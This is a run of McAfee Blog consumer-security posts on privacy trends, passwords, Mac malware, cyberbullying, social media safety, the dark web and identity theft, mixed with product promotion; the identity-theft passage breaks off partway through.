Every year we can count on new technology to make our lives easier. Right? As beneficial and convenient as tech can be, it can also pose risks to our online safety and privacy—risks that we should be prepared to handle. Increasingly, we’re seeing governments around the world implementing stricter privacy laws. And even major players like Google are phasing out invasive tracking technology like cookies. However, when it comes to activities like banking, shopping, taxes, and more, the need for broader online privacy protection has never been greater. Let’s take a look at some prominent trends in the way we now live online and how we can protect our data.
Crypto, the blockchain, NFTs, tokens – all of these terms are considered part of what’s being termed Web3. Whereas Web 2.0 described an internet made up of large corporations hosting content and consumers, Web3 is governed by the blockchain. What this means is that applications use a decentralized online ledger to document transactions of all sorts. The most famous example is bitcoin, a blockchain that acts as a digital currency. Another example would be NFTs, which are digital works of art. Web3 may be in its infancy, but it’s important to consider what this means for privacy and data protection. Blockchain affords users anonymity in regards to currencies like bitcoin. Of course that means bitcoin also has a reputation as the currency of choice for money-launderers and other shady enterprises. Still, that means it’s good for privacy, right? Well, maybe. The EU’s GDPR rights to erase or amend data are at odds with transactions on a blockchain, which are essentially unchangeable. So if you’re buying cryptocurrency, NFTs, or interacting with blockchains in other ways, just understand your personal information might be hidden, but the record of your transactions is totally visible.
Tip: If you’re keeping cryptocurrencies in an online wallet, you’ll want to use an identity protection service to monitor those account credentials so you can be warned of breaches and leaks onto the dark web.
Student privacy is a top concern as households turn to remote learning. In a rush to optimize remote learning experiences in the face of a rapidly evolving digital landscape, many educators and remote learners may not realize the hazards that put student privacy at risk.
Since 2020, schools have adopted a range of technologies to optimize the digital classroom, including virtual learning platforms, holistic learning solutions, and even social media applications. However, many of these digital platforms are not designed for child usage, nor do they have privacy policies in place to ensure that the student data gathered is protected. Many learning platforms may even treat student data as consumer data, raising more red flags regarding student data privacy and compliance. Online learning has also garnered the attention of cybercriminals looking to exploit student data, resulting in online bullying, identity theft, and more.
For educators and parents alike, knowledge is the greatest asset to mitigating the risks of remote learning. IT teams and educators must understand the implications of the student data they collect, govern access to it, and control its usage to comply with child privacy regulations. Parents can take proper precautions by discussing the importance of privacy with their children. Keeping learning platforms up to date and monitoring their children to prevent them from downloading suspicious apps or straying to unknown websites are all ways to ensure safer remote learning environments.
Tip: Getting a VPN for the family to use is a great way to safeguard your privacy while your kids are learning online.
Remote work has become commonplace nowadays as more companies permit their employees to work from home long-term and, for some, permanently. In a recent Fenwick poll among HR, privacy, and security professionals across industries, approximately 90% of employees now handle intellectual property, confidential, and personal information in their homes. Endpoint security, or the protection of end-user devices such as our laptops and mobile devices, poses more of a concern as employees trade in office networks for their in-home Wi-Fi. If these devices and networks are unsecured or if the data is not encrypted, employees run the risk of exposing sensitive information to hackers. Those of us working from home can help ensure the safety of our company’s confidential information by boosting our awareness of security threats and prevention measures via company-mandated security training.
Tip: McAfee’s Protection Score is a great way to understand how protected you are online and what you can do to stay more secure
This buzzy term is being used to describe Meta’s (previously Facebook) vision for a fully connected future. Right now it exists as an AR/VR space accessible through Meta’s own VR hardware, Oculus. However, the terminology has caught on as a catch-all for platforms that may contain work, business, gaming, entertainment, social interactions, and more in one easily navigable, immersive online setting. Web3 features, like blockchain, NFTs, and cryptocurrencies are being touted as integral parts of the metaverse. As exciting and futuristic as this is, there are major privacy questions that will have to be answered. This means that as customers you’ll want to think hard about what you choose to share through the metaverse and look into the privacy settings a platform offers you.
Tip: Use comprehensive online protection. McAfee Total Protection secures all aspects of your life online. From identity to online connections to antivirus, a full security suite like Total Protection keeps you and your family safer on all the devices you use and places you go online.
Some of the platforms I use the most allow me to keep track of and manage my finances. Whether it’s my mobile banking app or taking advantage of online tax filing, there is such a convenience in having the ability to pay bills, deposit checks, and more, all with the devices I use every day. But many of us may not realize just how much trust we put into these platforms to protect our online privacy, especially when we don’t have a clear picture of who exactly is on the other end of our online transactions.
While recognizing the signs of online banking and tax-related fraud helps ease the burdens associated with these schemes, there are multiple steps users can take to prevent becoming a victim of these scams in the first place.
Tip: Full-featured identity protection will protect you financially. Services like McAfee Identity Protection Service include credit checks, identity theft restoration, and even stolen fund restoration as benefits.
Digital devices are part of how we live our lives every day, whether we’re taking conference calls on our laptops, tracking the latest mile on our smartwatches, or banking on the go. Although our everyday digital devices make our lives that much more convenient, securing them makes our lives that much safer by minimizing online threats to ourselves and those around us. Safeguarding the digital platforms we use for work, school, finances, you name it, is the first step to ensuring our private information remains just that—private.
The post Privacy in Practice: Securing Your Data in 2022 and Beyond appeared first on McAfee Blog.
When you logged on to your computer this morning, data privacy probably wasn’t the first thing you were thinking about. The same goes for when you opened your phone to catch up on social media and check emails, turned on your smart TV for a family movie night, or all the other ways we routinely use our connected devices in our everyday lives.
Although we live in an increasingly connected world, most of us give little thought to data privacy until after our personal information has been compromised. However, we can take proactive steps to help ourselves and our loved ones navigate this environment in a safe way. On January 28th – better known as Data Privacy Day – we have the perfect opportunity to own our privacy by taking the time to safeguard data. By making data privacy a priority, you and your family can enjoy the freedom of living your connected lives online knowing that your information is safe and sound.
Did you know that there is a difference between data security and data privacy? Although the two are intimately intertwined, there are various characteristics of each that make them different. National Today3 provides a useful analogy to define the two:
At this point, we already know not to share our passwords or PIN numbers with anyone. But what about the data that is collected by companies every time we sign up for an email newsletter or make an online account? Oftentimes, we trust these companies to guard the personal data they collect from us in exchange for the right to use their products and services. However, the personal information collected by companies today is not regarded as private by default, with a few exceptions. For this reason, it’s up to us to take our data privacy into our own hands.
Because we spend so much of our day online, plenty of our information is available on the internet. But what happens if one of your favorite online retailers experiences a data breach? This is the reality of the world we live in today, as data breaches have been on the rise and hackers are continuously finding clever, new ways to access our devices and information.
Thanks to the COVID-19 pandemic, we’ve become more reliant on technology than ever before. Whether it be for distance learning, online shopping, mobile banking, or remote work, we’ve all depended on our devices and the internet to stay connected. But with more time online comes more opportunities for cybercriminals to exploit. For example, with the massive increase in remote work since the onset of the pandemic, hackers have hijacked online meetings through a technique called ‘Zoombombing4.’ This occurred after the online conferencing company shared personal data with Facebook, Google, and LinkedIn. Additionally, the number of patient records breached in the healthcare industry jumped to 21.3 million in the second half of 2020 due to the increase in remote interactions between patients and their providers5.
When it comes to data breaches, any business is a potential target because practically every business is online in some way. When you put this in perspective, it’s important to consider what information is being held by the companies that you buy from. While a gaming service will likely have different information about you than your insurance company, you should remember that all data has value, and you should take steps to protect it like you would money.
Your browsing history and personal information are private, and we at McAfee want to keep it that way. By using McAfee Secure VPN, you can browse confidently knowing that your data is encrypted.
To further take control of your data privacy, monitor the health of your online protection with McAfee’s Protection Score. This tool provides simple steps to improve your security and allows you to know how safe you are online, which is the first step towards a safer, more confident connected life. Check your personal protection score here.
Here are a few more tips to keep you on top of your data privacy game:
1. Update your privacy and security settings. Begin with the websites and apps that you use the most. Check to see if your accounts are marked as private, or if they are open to the public. Also, look to see if your data is being leaked to third parties. You want to select the most secure settings available, while still being able to use these tools correctly.
2. Lock down your logins. Secure your logins by making sure that you are creating long and unique passphrases for all your accounts. Use multi-factor identification, when available.
3. Protect your family and friends. You can make a big difference by encouraging your loved ones to protect their online privacy. By helping others create solid safety habits as they build their digital footprints, it makes all of us more secure.
Follow the conversation this Data Privacy Day by following #PrivacyAware and #DataPrivacyDay on social media.
The post It’s Data Privacy Day: Here’s How to Stay Protected in 2022 appeared first on McAfee Blog.
Sometimes, I feel that my brain is full! We are all bombarded with information on so many fronts and quite frankly, I often feel like I don’t have room for much more! A quick scroll on my socials and I’m inundated with news from friends (which I love) plus ads plus multiple news updates. I open my emails, and the same happens! So much information!! So little time!
So, in the spirit of being brief and not overloading, I’m going to focus on one easy yet powerful way you can make a positive impact on your online safety – how you manage your password. Of course, I could add many more strategies to this list but let’s keep it simple – our brains are full!!
Why Are Passwords So Important?
Passwords are the key to everything we do online. Whether we are logging in to our emails, social media platforms, online banking, or favorite shopping websites – your password is your way in. And if you’re anything like me, you probably have multiple passwords. The last time I checked, I had over 100 different passwords stored in my True Key password manager!
These small codes are so incredibly important because in short, they are the only thing stopping a hacker from accessing your online accounts. In many cases, they are your only defense strategy against a hacker taking over your accounts and creating havoc.
Fortunately, there are several steps we can take to ensure we nail this password thing and minimize the risk of being hacked. Here are my top five:
I have been saying to my kids for years: passwords are like toothbrushes – they are NOT to be shared! No exceptions. It doesn’t matter how much you love your best friend or girlfriend, your password is your password. When you are young and donning rose-colored glasses, you often don’t factor in that things can change. Relationships can sour and romance can die. If someone has access to your online accounts and they have hurt feelings then they have an opportunity to create chaos. And we’ve all read the stories…
Yes, I agree – this is a big pain! But it is probably one of the best ways of protecting yourself and here’s why. If you use the same password for each of your online accounts and your account is hacked then the hacker has access to all of your online accounts: your social media platforms, your banking, your entire life!
It will add another step to your login process but choosing 2-factor authentication (or multi-factor authentication) is another small yet powerful way to keep your password secure by adding another layer of protection to your passwords. In most cases, the additional factor is a code or a token sent to your mobile phone. Sometimes, a separate app can also be used to generate a code or token that will confirm it is really you trying to log in!
Some experts believe length is more important than complexity but I say embrace both! If you can create a complex 16 character password that includes lower and upper case letters, numbers and symbols then you are doing very well! I am personally a fan of the crazy, nonsensical sentence. For example – GrassisRed&Blue7 – silly, nonsensical but memorable. I believe it’s all about making them hard to guess but easy to remember. And remember to NEVER use information in your passwords that other people might know about you or that is also included in your social media accounts eg your kids’ or pet’s names.
I am sure my longevity has improved dramatically since using a password manager! Password managers, or vaults, are an absolute no-brainer. Not only do they store your passwords securely across your chosen devices, but they also help you create complex passwords that no human could even contemplate. I have it installed on both my laptop and my phone and it works seamlessly between both devices. It’s time to throw away your little black book of passwords, people! You’ll never look back once this whole password management process is automated.
So, if you’re feeling a little overwhelmed at where to start with your digital safety this New Year then I implore you to make this one small change. Nailing your password strategy is without doubt one of the best ways of shoring up your online safety!
Happy New Year!!
Alex xx
The post Passwords are Like Toothbrushes – Not to Be Shared!! appeared first on McAfee Blog.
It’s a long-standing question. Can Apple Macs get viruses?
While Apple does go to great lengths to keep all its devices safe, this doesn’t mean your Mac is immune to all computer viruses. So what does Apple provide in terms of antivirus protection? Let’s take a look along with some signs that your Mac may be hacked and how you can protect yourself from further threats beyond viruses, like identity theft.
Whether hackers physically sneak it onto your device or by tricking you into installing it via a phony app, a sketchy website, or a phishing attack, viruses and malware can create problems for you in a few ways:
Some possible signs of hacking software on your Mac include:
Is your device operating more slowly, are web pages and apps harder to load, or does your battery never seem to keep a charge? These are all signs that you could have malware running in the background, zapping your device’s resources.
Like the performance issues above, malware or mining apps running in the background can burn extra computing power (and data). Aside from sapping performance, malware and mining apps can cause your computer to run hot or even overheat.
If you find apps you haven’t downloaded, along with messages and emails that you didn’t send, that’s a red flag. A hacker may have hijacked your computer to send messages or to spread malware to your contacts. Similarly, if you see spikes in your data usage, that could be a sign of a hack as well.
Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your computer may have been hacked.
Macs contain several built-in features that help protect them from viruses:
Similarly, all apps that wish to be sold on the Apple App Store must go through Apple’s App Review. While not strictly a review for malware, security matters are considered in the process. Per Apple, “We review all apps and app updates submitted to the App Store in an effort to determine whether they are reliable, perform as expected, respect user privacy, and are free of objectionable content.”
There are a couple reasons why Mac users may want to consider additional protection in addition to the antivirus protection that Mac provides out of the box:
In all, Macs are like any other connected device. They’re susceptible to threats and vulnerabilities as well. Looking more broadly, there’s the wider world of threats on the internet, such as phishing attacks, malicious links and downloads, prying eyes on public Wi-Fi, data breaches, identity theft, and so on. It’s for this reason Mac users may think about bolstering their defenses further with online protection software.
Staying safer online follows a simple recipe:
Reading between the lines, that recipe can take a bit of work. However, comprehensive online protection can take care of it for you. In particular, McAfee Total Protection includes an exclusive Protection Score, which checks to see how safe you are online, identifies gaps, and then offers personalized guidance, and helping you know exactly how safe you are.
An important part of this score is privacy and security, which is backed by a VPN that turns on automatically when you’re on an unsecure network and personal information monitoring to help protect you from identity theft—good examples that illustrate how staying safe online requires more than just antivirus.
So, Macs can get viruses and are subject to threats just like any other computer. While Macs have strong protections built into them, they may not offer the full breadth of protection you want, particularly in terms of online identity theft and the ability to protect you from the latest malware threats. Consider the threats you want to keep clear of and then take a look at your options that’ll help keep you safe.
The post Can Apple Macs get Viruses? appeared first on McAfee Blog.
Most parents may find it difficult to relate to today’s form of cyberbullying. That’s because, for many of us, bullying might have come in a series of isolated, fleeting moments such as an overheard rumor, a nasty note passed in class, or a few brief hallway confrontations.
Fast forward a few dozen decades, and the picture is spectacularly different and a world few adults today would eagerly step into.
Cyberbullying includes targeting that is non-stop. It’s delivered digitally in an environment that is often anonymous. It’s a far-reaching, esteem-shattering, emotional assault. And the most traumatic component? The perpetual nature of the internet adds the ever-present threat of unlimited accessibility—kids know bullying can happen to anyone, at any time, and spread like wildfire.
The nature of cyberbullying can make a young victim feel hopeless and powerless. Skipping school doesn’t stop it. Summer vacation doesn’t diminish it. That’s because the internet is ever-present.
According to a 2020 Ditch the Label Cyberbullying Study, youth today reveal that carrying the emotional weight of being “connected all the time” is anything but fun and games. Here’s a snapshot.
While all kids are at risk for cyberbullying, studies reveal that some are more vulnerable than others.
According to the Pew Research Center, females experience more cyberbullying than their male counterparts; 38% of girls compared to 26% of boys. Those most likely to receive a threatening or aggressive text, IM, or email: Girls ages 15-17.
More data from the CDC and American University reveals that more than 28.1 % of LGBTQ teens were cyberbullied in 2019, compared to 14.1% of their heterosexual peers. In addition, Black LGTBQ youth are more likely to face mental health issues linked to cyberbullying and other forms of bullying as compared to non-Black LGTBQ and heterosexual youth.
Another community that can experience high cyberbullying is gamers. If your child spends a lot of time playing online games, consider paying close attention to the tone of conversations, the language used, your child’s demeanor during and after gaming, and, as always, stay aware of the risks. In a competitive gaming environment that often includes a variety of age groups, cyberbullying can quickly get out of control.
Lastly, the reality no parent wants to confront—but one that is critical to the conversation—is that cyberbullying and suicide may be linked in some ways. According to JAMA Pediatrics, approximately 80% of young people who commit suicide have depressive thoughts, and in today’s online environment, cyberbullying often leads to more suicidal thoughts than traditional bullying.
Each new year represents 365 new days and 365 new chances to do things a little bit better than we’ve done them in the past. And while it’s impossible to stop our kids from wandering into the crossfire of hurtful words online, we can do everything possible to reduce their vulnerability and protect their self-esteem.
The post Cyberbullying: Words do Hurt When it Comes to Social Media appeared first on McAfee Blog.
Social media is part of our social fabric. So much so that nearly 50% of the global population are social media users to some degree or other. With all that sharing, conversing, and information passing between family and friends, social media can be a distinct digital extension of ourselves—making it important to know how you can protect your social media accounts from hacks and attacks.
Beyond the sheer number of people who’re on social media, there’s also the amount of time we spend on it. People worldwide spend an average of 145 minutes a day on social media. With users in the U.S. spending just over two hours on social media a day and users in the Philippines spending nearly four hours a day, that figure can vary widely. Yet it’s safe to say that a good portion of our day features time scrolling and thumbing through our social media feeds.
Given how much we enjoy and rely on social media, now’s a fine time to give your social media settings and habits a closer look so that you can get the most out of it with less fuss and worry. Whether you’re using Facebook, Instagram, TikTok, or whatnot, here are several things you can do that can help keep you safe and secure out there:
Passwords mark square one in your protection, with strong and unique passwords across all your accounts forming primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task—thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one.
Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy.
Be critical of the invitations you receive. Out-and-out strangers could be more than just a stranger, they could be a fake account designed to gather information on users for purposes of cybercrime, or they can be an account designed to spread false information. There are plenty of them too. In fact, in Q3 of 2021 alone, Facebook took action on 1.8 billion fake accounts. Reject such requests.
Nothing says “there’s nobody at home right now” like that post of you on vacation or sharing your location while you’re out on the town. In effect, such posts announce your whereabouts to a broad audience of followers (even a global audience, if you’re not posting privately, as called out above). Consider sharing photos and stories of your adventures once you’ve returned.
It’s a famous saying for a reason. Whether your profile is set to private or if you are using an app with “disappearing” messages and posts (like Snapchat), what you post can indeed be saved and shared again. It’s as simple as taking a screenshot. If you don’t want it out there, forever or otherwise, simply don’t post it.
We’re increasingly accustomed to the warnings about phishing emails, yet phishing attacks happen plenty on social media. The same rules apply. Don’t follow any links you get from strangers by way of instant or direct messengers. And keep your personal information close. Don’t pass out your email, address, or other info as well. Even those so-called “quiz” posts and websites can be ruses designed to steal bits and pieces of personal info that can be used as the basis of an attack.
Sadly, social media can also be a place where people pull a fast one. Get-rich-quick schemes, romance cons, and all kinds of imposters can set up shop in ads, posts, and even direct messages—typically designed to separate you from your personal information, money, or both. This is an entire topic to itself, and you can learn plenty more about quizzes and other identity theft scams to avoid on social media.
Some platforms such as Facebook allow users to review posts that are tagged with their profile names. Check your account settings and give yourself the highest degree of control over how and where your tags are used by others. This will help keep you aware of where you’re being mentioned by others and in what way.
Security software can protect you from clicking on malicious links while on social media while steering you clear of other threats like viruses, ransomware, and phishing attacks. It can look out for you as well, by protecting your privacy and monitoring your email, SSN, bank accounts, credit cards, and other personal information. With identity theft a rather commonplace occurrence today, security software is really a must.
Now you can point to a number that shows you just how safe you are with our Protection Score. It’s an industry first, and it works by taking stock of your overall security and grading it on a scale of 0 to 1,000. From there, it calls out any weak spots and then walks you through the steps to shore it up with personalized guidance. This way, you’re always in the know about your security, privacy, and personal identity on social media and practically wherever else your travels take you online.
The post How to Protect Your Social Media Accounts appeared first on McAfee Blog.
You can feel even more confident that you’ll enjoy life online with us at your side. AV-Comparatives has awarded McAfee as its 2021 Product of the Year.
McAfee makes staying safe simple, and now this endorsement by an independent lab says we protect you best.
Over the course of 2021, AV-Comparatives subjected 17 different online protection products to a series of rigorous tests. Their labs investigated each product’s ability to protect against real-world Internet threats, such as thousands of emerging malicious programs and advanced targeted attacks, along with the ability to provide protection without slowing down the computer.
McAfee topped the field, taking home the award for AV-Comparatives’ Product of the Year thanks to our highest overall scores across the seven different testing periods throughout the year. McAfee further took a Gold Award for the Malware Protection Test, in addition to recognition for its clean, modern, and touch-friendly design and for the way that McAfee Firewall coordinates perfectly with Windows.
“We’re honored by the recognition,” says Chief Technology Officer, Steve Grobman. “The strong reputation that AV-Comparatives carries in the industry cements our place as a leader in online protection.” He goes on to say, “Our work continues. The internet is evolving to be integral to every part of our lives. This creates new opportunities for cybercriminals and drives the evolution of the threat landscape. McAfee is committed to staying one step ahead of these sophisticated threats, ensuring customers can safely utilize the full value of our online world.”
Read the full AV-Comparatives annual report and protect yourself and your family with the year’s top-rated antivirus. Give it a look for yourself with a free 30-day trial of McAfee Total Protection, which includes McAfee’s award-winning anti-malware technology plus identity monitoring, Secure VPN, and safe browsing for an all-in-one online protection.
The post McAfee Wins Product of the Year for Best Online Protection appeared first on McAfee Blog.
People have made it clear. They’re feeling more exposed to online threats and want stronger protection.
Our 2022 Trends Study puts figures to these feelings, saying that they believe the risks to their online privacy have increased over the past year. Moreover, 42% believe the risks to their personal and financial information have increased as well.
These findings come as more consumers shift their daily lives online, with greater use of internet banking, more investment in virtual assets, and a proliferation of online activities due to COVID-19. A lot more sensitive personal information is being stored and shared on the web, which is putting increased pressure on passwords and security measures.
As more sensitive personal information is being stored and shared on the web, people are showing a strong preference for increased security overall. For example, when asked to choose between connecting with others from anywhere to always being fully protected, the response was overwhelming in favor of strong protection (63%) over ease of connection (16%). The same sentiment extended to the workplace, where “work meetings that are guaranteed seamless” trailed significantly at 14% versus “meetings that are guaranteed secure” at (62%).
Curious as to what steps you can take to be safer online? A few tools along with a few good habits can go a long way toward keeping your privacy and identity secure.
1. Install and use online protection software: By protecting your devices, you protect what’s on them, like your personal information. Comprehensive online protection software can protect your identity in several ways, like steering you clear of malicious downloads and links, protecting your email from phishing attacks, and providing you with a digital shredder that can permanently remove sensitive documents from your computer (simply deleting them won’t do that alone).
2. Use a VPN: A VPN is a Virtual Private Network, a service that protects your data and privacy online. It creates an encrypted tunnel to keep you anonymous by masking your IP address while connecting to public Wi-Fi hotspots. This is a great way to shield your information from crooks and snoops while you’re banking, shopping, or handling any kind of sensitive information online.
3. Improve your passwords and use multi-factor authentication (MFA): Strong, unique passwords for each of your accounts, updated regularly, offer a strong line of defense against attackers. While this may require a bit of effort, a password manager can do the work for you by securely creating and storing strong, unique passwords for you. Comprehensive online protection software will include a password manager as one of its many features. Additionally, MFA adds yet another layer of security by double-checking your identity beyond your username and password, usually with a text or email. If any of your accounts offer MFA, consider using it.
4. Monitor your accounts: Give your statements a close look each time they come around. While many companies and institutions have fraud detection mechanisms in place, they don’t always catch every instance of fraud. Look out for strange purchases or charges and follow up with your bank or credit card company if you suspect fraud. Even the smallest charge could be a sign that something shady is afoot.
5. Check your credit report: This is a powerful tool for spotting identity theft. And in many cases, it’s free to do so. In the U.S., the Fair Credit Reporting Act (FCRA) requires the major credit agencies to provide you with a free credit check at least once every 12 months. Canada provides this service, and the UK has options to receive free reports as well, along with several other nations. It’s a great idea to check your credit report, even if you don’t suspect a problem.
6. Consider using identity protection: In addition to checking your own credit report, an identity protection service provides yet deeper monitoring of your personal information. Identity protection such as ours monitors up to 60 different pieces of vital personal information and notifies you of potential misuse—up to ten months sooner than similar services. In addition to this around-the-clock monitoring, it also provides up to $1 million in coverage for lawyer fees, travel expenses, lost wages, and more.
The post Today’s Trends: Consumers Prioritize Protection Over Convenience appeared first on McAfee Blog.
The internet has opened up wonderful new possibilities in our world, making life easier on many levels. You can pay your bills, schedule your next family vacation, and order groceries with the click of a button. While the internet offers many positive benefits, it also has some negatives. Although not entirely used for illicit purposes, the dark web is one part of the internet that can be used by criminals for illegal purposes, like selling stolen personal information.
But just what is the dark web? Basically, it’s a part of the internet that isn’t indexed by search engines. As an average internet user, you won’t come across the dark web since you need a special browser to access it. It’s certainly not something you need to stress about in your day-to-day browsing, and you shouldn’t let it scare you off the internet. Unless you actively seek it out, you’ll likely never have any contact with the dark web in your lifetime.
A better understanding of what the dark web is and the possible threats it contains can help you protect yourself, though. This guide provides the essential information you need, explaining the different levels of the web and revealing how you can stay safe. With this knowledge, you can continue to browse online with confidence. Find out more below.
The “dark web” refers to websites that aren’t indexed by search engines like Google and Bing. This might seem strange since most people want their websites to be found through specific searches. Practices like search engine optimization (SEO) are specifically implemented to help websites perform well and rank higher in search engine results.
So, why would someone not want their website to be picked up by a search engine? The primary purpose is to preserve privacy and anonymity. The individuals and organizations on the dark web often engage in illegal activities and want to keep their identities hidden — something that is difficult to do with an indexed website.
It’s important to note that the dark web should not be confused with the deep web, which is a part of the internet individuals access regularly. Although the terms are sometimes used interchangeably, they actually refer to different things. Deep web content — which isn’t picked up by search engines, either — includes pages that typically require additional credentials to access. Your online banking accounts and email accounts, for instance, are examples of deep web content.
The internet is home to billions of websites — an estimated 1.7 billion to be exact, although that number changes every day as new sites are made and others are deleted. Your daily internet activity likely falls within the publicly available and readily accessible portion of the internet (otherwise known as the surface web). However, there are additional “levels” of the internet beyond that top level. Read on to learn more.
The internet you use to search for more information is referred to as the surface web or open web. This is the readily visible part of the internet anyone can access with an internet connection and a normal web browser like Safari, Mozilla Firefox, or Google Chrome. Other terms for the surface web include the visible web, lightnet, or indexed web.
Examples of content you’ll find on the surface web include:
Basically, the sites you use daily — from your favorite news site to a local restaurant — are part of the surface web. What makes these websites part of the surface web is that they can be located via search queries and have recognizable endings like .com, .edu, .gov, or .org. You are able to find websites on the surface web because they are marked as “indexable,” meaning search engines can index and rank them. The sites are readily available on the search engine results pages (SERPs).
Interestingly, the surface web only makes up around 4% of the total internet, meaning the internet is a lot more than what you see on the surface. Think of it as an ocean — there’s the top layer of water you can see and then there’s the vast world beneath. The remainder of the internet is what’s below the surface.
The deep web refers to any page on the internet that isn’t indexed by search engines as described above. The deep web is the first level beneath the “surface” of the visible web — and it’s significantly larger than the surface web, accounting for an estimated 96% to 99% of the entire internet.
It’s important to note that just because this type of content isn’t on the surface doesn’t mean it’s nefarious or has ill intent. A lot of the time, this content isn’t indexed because it includes pages that are meant to be hidden to protect consumer privacy, such as those that require login credentials.
Here are some examples of content on the deep web:
Essentially, any webpage that requires a login is part of the deep web. That said, deep web content doesn’t necessarily have to fall into any of these categories. Any page that is non-indexable is technically also considered part of the deep web. It doesn’t have to require a login or contain sensitive data. Website creators and managers can mark pages as non-indexable if desired.
It’s worth noting that sometimes a single organization’s website will include elements of both the surface web and the deep web. Take a college or university website, for example. Most schools have a comprehensive website providing information about the school’s history, campus location, student body, available programs of study, extracurricular activities, and more.
However, many schools also have an intranet — sometimes linked from the main university page — that’s accessible only for students or staff. This is where students might sign up for classes and access their school email, for example. Since this is sensitive information and requires a unique login, it doesn’t need to be made publicly available via search engines.
In fact, it’s better in the interest of privacy that these pages aren’t readily visible. It helps to protect the user’s data. From this example, you can see that the “deep web” doesn’t have to be scary, illicit, or illegal. It serves a legitimate and useful purpose. You shouldn’t be afraid of the deep web. It’s further important to distinguish the deep web from the dark web — as the next section explains.
As mentioned, the deep web and the dark web sometimes get confused. However, they are distinct. Technically, the dark web is a niche or subsection within the deep web. It consists of websites that aren’t indexable and can’t be readily found online via web search engines. However, the dark web is a carefully concealed portion of the deep web that people go out of their way to keep hidden.
What makes the dark web distinct from the broader deep web is the fact that dark web content can only be accessed via a special browser. The Tor network is often used to access the dark web.
Additionally, the dark web has a unique registry operator and uses security tools like encryption and firewalls, further making it inaccessible via traditional web browsers. Plus, the dark web relies on randomized network infrastructure, creating virtual traffic tunnels. All of these technical details serve to promote anonymity and protect dark web users’ privacy.
The short answer is no, it’s not illegal to browse the dark web. In fact, there are instances where individuals can use it for good. Whistleblowers, for instance, can find the anonymity available through the dark web valuable when working with the FBI or another law enforcement organization.
That said, while it’s not illegal to browse the dark web, it’s also not completely void of criminal activity. Putting yourself in close proximity with illegal activities is rarely a good idea and could heighten your risk of being targeted by a criminal yourself. It’s often best to leave that part of the deep web alone.
There are also many technological threats on the dark web. Malicious software, also known as malware, is a critical concern and can affect unsuspecting users. Even simply browsing the dark web out of curiosity can expose you to such threats, like phishing malware or keyloggers. While an endpoint security program can identify such threats if they end up on your computer, it’s ideal to avoid them altogether.
Further, if you try to buy something on the dark web — even if it’s not illegal — there’s a chance you’ll be scammed. Dark web criminals use a variety of tricks to con people. For example, they may hold money in escrow but then shut down the e-commerce website and take off with the money. Due to the anonymous nature of the dark web, it’s very difficult for law enforcement to find such perpetrators.
Given its anonymous nature, the dark web clearly has an obvious appeal for cybercriminals. But just what do they use it for? The most obvious type of internet activity is the buying and selling of black market goods and services, from illegal drugs to illegal content. Cybercriminals may also run scams when selling such items, for example by taking a person’s money and not delivering the required product.
There are dark websites dedicated to the purchase and sale of illegal products or services (usually using untraceable cryptocurrencies like bitcoin) including:
Browsers like Tor, an open-source and free software, allow people to access dark websites where these goods are available, like a digital marketplace. These websites may look similar to any other surface or deep website you’d encounter. However, they differ in their domain suffix, ending in “.onion” instead of more obvious options like “.com” (Tor is actually short for The Onion Router, which is also where the term “onion routing” comes from — referring to anonymous communication on the dark web).
Onion sites often use scrambled names that make their URLs difficult to remember, minimizing the odds of being reported to authorities. It’s possible to search the dark web using specialized dark web search engines like Grams or link lists like The Hidden Wiki. However, these sources tend to be slow and unreliable, just like the dark web itself.
Some of this information can be extremely valuable on darknet forums. For example, while a Social Security number might go for $2, email credentials could sell for as much as $120,000. Hackers can make a lot of money and do so with less worry that they might get caught. Thanks to the Tor browser’s layers of encryption and IP scrambling, it’s difficult to track people down on this part of the web.
Again, although the dark web isn’t inherently bad, you should still be proactive in preventing your personal information from falling into the wrong hands. Here are a few ways you can help keep you and your family safe online:
The dark web might sound scary. The fact is, an everyday internet user like yourself likely won’t have any contact with this level of the internet. That said, it’s still important to take as many precautions as you can to keep your family and your technology safe.
McAfee provides everyday internet users with the tools they need to surf safely and confidently. Our award-winning antivirus software protects against threats like phishing, malware, and ransomware, and we also offer identity protection plans that come with a personalized Protection Score to check the health of your online information. Start browsing with confidence by using McAfee.
The post The Dark Web: A Definitive Guide appeared first on McAfee Blog.
We live online these days, sharing everything from vacation pictures to what we eat for breakfast on the internet. The internet is also useful for daily activities, like buying groceries or paying bills.
While it’s convenient to connect with people and complete tasks online, cybercriminals are eager to use the internet to steal financial or personal data for their personal gain — otherwise known as identity theft. This is a criminal act and can affect your credit score in a negative way and cost money to fix. It can also affect employment opportunities since some employers conduct a credit check on top of drug testing and a criminal history check. Identity theft victims may even experience an impact to their mental health as they work to resolve their case.
The good news is that being able to recognize the signs of identity theft means you can act quickly to intervene and minimize any effects in case it happens to you. You can also protect yourself by using preventive measures and engaging in smart online behavior. This article provides essential information about identity theft, giving you the tools you need to become an empowered internet user and live your best life online.
The internet is a great place to be, but identity thieves hope to catch you off-guard and seek access to your personal information for their benefit. This could include private details like your birth date, bank account information, Social Security number, home address, and more. With data like this, an individual can adopt your identity (or even create a fake identity using pieces of your personal profile) and apply for loans, credit cards, debit cards, and more.
You don’t have to be kept in the dark, though. There are several signs that your identity has been stolen, from a change in your credit score to receiving unfamiliar bills and debt collectors calling about unfamiliar new accounts. If you suspect that you’ve been affected by identity fraud, you can act fast to minimize what happens. Here’s what to do.
Start by contacting law enforcement to file a report. Your local police department can issue a formal report, which you may need to get your bank or other financial institution to reverse fraudulent charges. An official report assures the bank that you have been affected by identity fraud and it’s not a scam.
Before going to the police, gather all the relevant information about what happened. This could include the dates and times of fraudulent activity and any account numbers affected. Bringing copies of your bank statements can be useful. Also, make note of any suspicious activity that could be related. For example, was your debit card recently lost or your email hacked? The police will want to know.
You should also notify any businesses linked to your identity theft case. Depending on the type of identity theft, this could include banks, credit card companies, medical offices, health insurers, e-commerce stores, and more. For example, if someone used your credit card to make purchases on Amazon, alert the retailer.
Medical identity theft is another good example. In this case, a fraudster may assume your identity to gain access to health care services, such as medical checkups, prescription drugs, or pricey medical devices like wheelchairs. If someone uses your health insurance to get prescription drugs from a pharmacy, for instance, make sure to alert the pharmacy and your insurer.
